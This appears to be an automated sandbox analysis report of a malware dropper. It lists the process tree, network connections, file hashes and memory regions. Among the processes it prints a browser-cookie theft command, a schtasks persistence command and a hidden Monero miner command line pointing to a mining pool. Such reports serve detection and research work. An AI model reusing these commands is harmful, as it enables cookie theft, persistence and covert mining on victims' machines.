PID 4204 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
PID 2016 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp
PID 2016 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp
PID 2016 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp
PID 2716 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 2716 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 2716 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 2712 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe
PID 2712 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe
PID 2712 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe
PID 4956 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
PID 4956 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe

jobiea_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe

jobiea_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe

jobiea_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe

jobiea_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe

jobiea_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe

jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe

jobiea_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp" /SL5="$70054,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3096 -ip 3096

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe

jobiea_7.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 560

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732633222 0

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 840 -ip 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 356

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2664 -ip 2664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 1912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2664 -ip 2664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 1900

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 superstationcity.com udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 most-fast-link-download.com udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
N/A 127.0.0.1:51176 tcp
N/A 127.0.0.1:51178 tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 25.27.17.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 live.goatgame.live udp
GB 51.195.138.197:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 197.138.195.51.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 224.58.15.51.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 zisiarenal.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe

MD5 53e7a64679ca4f7013fa4d5a99e468ce
SHA1 1af9957eb5e0cc4aae3d2dfecdcd157973c60740
SHA256 7efe1fe3251a3c4a7b617b28159b2d95526f25c367d5b8ae6152eae8d61d3b09
SHA512 21708bff7f2b1bd68101ad68dc288f0d1ac5cb57eec47dbff25b260571335fb95520be53577a9e2c286bfceccefaaa821a3932f39ad07276822855c52724153c

memory/3096-36-0x0000000000400000-0x000000000051E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3096-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.txt

MD5 270dd1da0ab7f38cdff6fab84562ec7a
SHA1 cf7be169ee4415085baeb4aeaa60932ac5abf4ac
SHA256 7d7d5ae0fa9286fea65a6f94240389998ff0d08340a2aedc67ef3547e84d64c6
SHA512 dc3d7d112a8e43c34261f3425ef6710d61cb92d797dd4a1e9b04e02971db42a4a2e2488bf5397c0ec9a6a1a6a718cec77c379377647402099cb7e4a5bb381286

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.txt

MD5 88b6a56754826eb2bef62f924dc7cad1
SHA1 7fe9a4062f27fa3a4680fa477d318f79a5c05d0e
SHA256 1c860063f8a60beadbda89e4467ded5291c50630d49f3f3d3c5964d48cf6165e
SHA512 352c0988c54618ad5e6ba9a756532e15e70401ca6cd7f1931d25c93c3af7665fbc90bd8079b1f1b9a13a1d3e1009ea2c798110825a2c4ebef17620affc13b112

memory/2016-81-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe

MD5 01486414c872995f04d7a157c4fb4f50
SHA1 c135c2c5cf4a3abdd5be5c78ef4424601289cdbb
SHA256 838d963c1db2236db9b12a2ebfd44c7e267afcf2dc79ef3ca4f81416f527b122
SHA512 60587beeaf28c95ada7e7b9cb41e148b7aace8d7134de13c42751295fb4024ae05ec5f9772ad1fd4efdaa559136bd079a91c6cfd9efd6880c8bdf61b9b586556

C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp

MD5 9638f27a949cc2c5ba8eacaa5532256c
SHA1 5de822a91542245433b43cfb73c0bfc3cb4abc22
SHA256 263717e1bc127eb304a9e2f5f9498eb1de3104a4706b22401cff24554bed4e38
SHA512 1972e6aca6be4fb1c44de1e2aee43cb982024a52d88fa57b982592aa599d9eface31d4e67ced2f9a30e6c5120284e775f61f68dd08baae2eb59223f5083f3dac

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

memory/4956-98-0x0000000000C00000-0x0000000000C6A000-memory.dmp

memory/3692-99-0x0000000000920000-0x0000000000926000-memory.dmp

memory/3692-101-0x0000000000930000-0x0000000000956000-memory.dmp

memory/3692-102-0x0000000000950000-0x0000000000956000-memory.dmp

memory/4956-103-0x0000000005430000-0x000000000544E000-memory.dmp

memory/4956-100-0x0000000005490000-0x0000000005506000-memory.dmp

memory/320-96-0x0000000000BE0000-0x0000000000CCE000-memory.dmp

memory/3692-95-0x0000000000150000-0x0000000000186000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe

MD5 de9ac7ed448ac60b2e376edfc1f24253
SHA1 465b102df59d83aa1905e0f50183bb432d319f49
SHA256 3f3d534e98560d0f53b5f6eeb9d0450de897ee467428659de7e72d74eba6735c
SHA512 cb13c421e6d7706b8b9266b736eeb1ad65ed599a8802168d27aab3f2e58dba8d9cf74ede874e886e697347cdb76b34913e569dbb1f8306fb999e99416d22ee7d

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe

MD5 3d7cb53c9a570dc454c1f209ac8e33b7
SHA1 40b96a338aebe63c9b794547e840c9dd3470af6b
SHA256 8bcd2b42e543f9638e5027e4e5cb19c46dd2bbed9f2038524b65d882f1775005
SHA512 cb250d5fdbaa90ae715856e791e4d0afb6ee2ba9975e48b9059a15926f481abb296b8340433c3aa36d56288981c6f3b67af503f61c16afc0d75e83e3ebd967cd

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe

MD5 52e5bf9bc7e415e0dd079bfa2d753054
SHA1 086f3ca067952333f587384ec81ac5cfb343d1db
SHA256 19c5cf5343d2ab1b120d41b3c536340ccb8a6c0656ba9567d7ce5afaed18e277
SHA512 f3386dc44073be1f3bdf471a0144363a55311088738a4e0d87250f2038bcf41bd884afbce8a4d98f57a82d7ba8cfe68c9366ef4c5ba9250a0e470806338054bc

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.txt

MD5 e7aead0a71f897afb254f3a08722de8d
SHA1 aa41126b5694f27cf9edb32913044abeb152bdf7
SHA256 2d8620595da28433fa92b80eaac2560300f7be34bbf14280c843f6b033e5f6eb
SHA512 f589708c51a7d1414018d664fb82d67b220b262e90e00c5c6f30cc3c30930b734a3b0df412ae3e372cec8c3839c8b2e7cb218083be217eabc20b05ba6e236de8

memory/3096-70-0x0000000000400000-0x000000000051E000-memory.dmp

memory/3096-69-0x0000000000400000-0x000000000051E000-memory.dmp

memory/3096-68-0x0000000000400000-0x000000000051E000-memory.dmp

memory/3096-67-0x0000000000400000-0x000000000051E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\is-LK11A.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/4492-107-0x0000000000400000-0x000000000045B000-memory.dmp

memory/4956-118-0x0000000005B70000-0x0000000006114000-memory.dmp

memory/4952-123-0x0000000000400000-0x000000000045B000-memory.dmp

memory/4492-121-0x0000000000400000-0x000000000045B000-memory.dmp

memory/3096-66-0x0000000000400000-0x000000000051E000-memory.dmp

memory/3096-65-0x0000000000400000-0x000000000051E000-memory.dmp

memory/3096-64-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3096-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3096-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3096-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3096-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3096-57-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3096-56-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3096-55-0x0000000000F20000-0x0000000000FAF000-memory.dmp

memory/3096-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3096-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3096-53-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3096-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3096-48-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3096-43-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/4952-130-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1264-142-0x0000000000400000-0x0000000000516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2016-149-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2176-139-0x0000000000B00000-0x0000000000B10000-memory.dmp

memory/516-154-0x00000000022C0000-0x00000000023A4000-memory.dmp

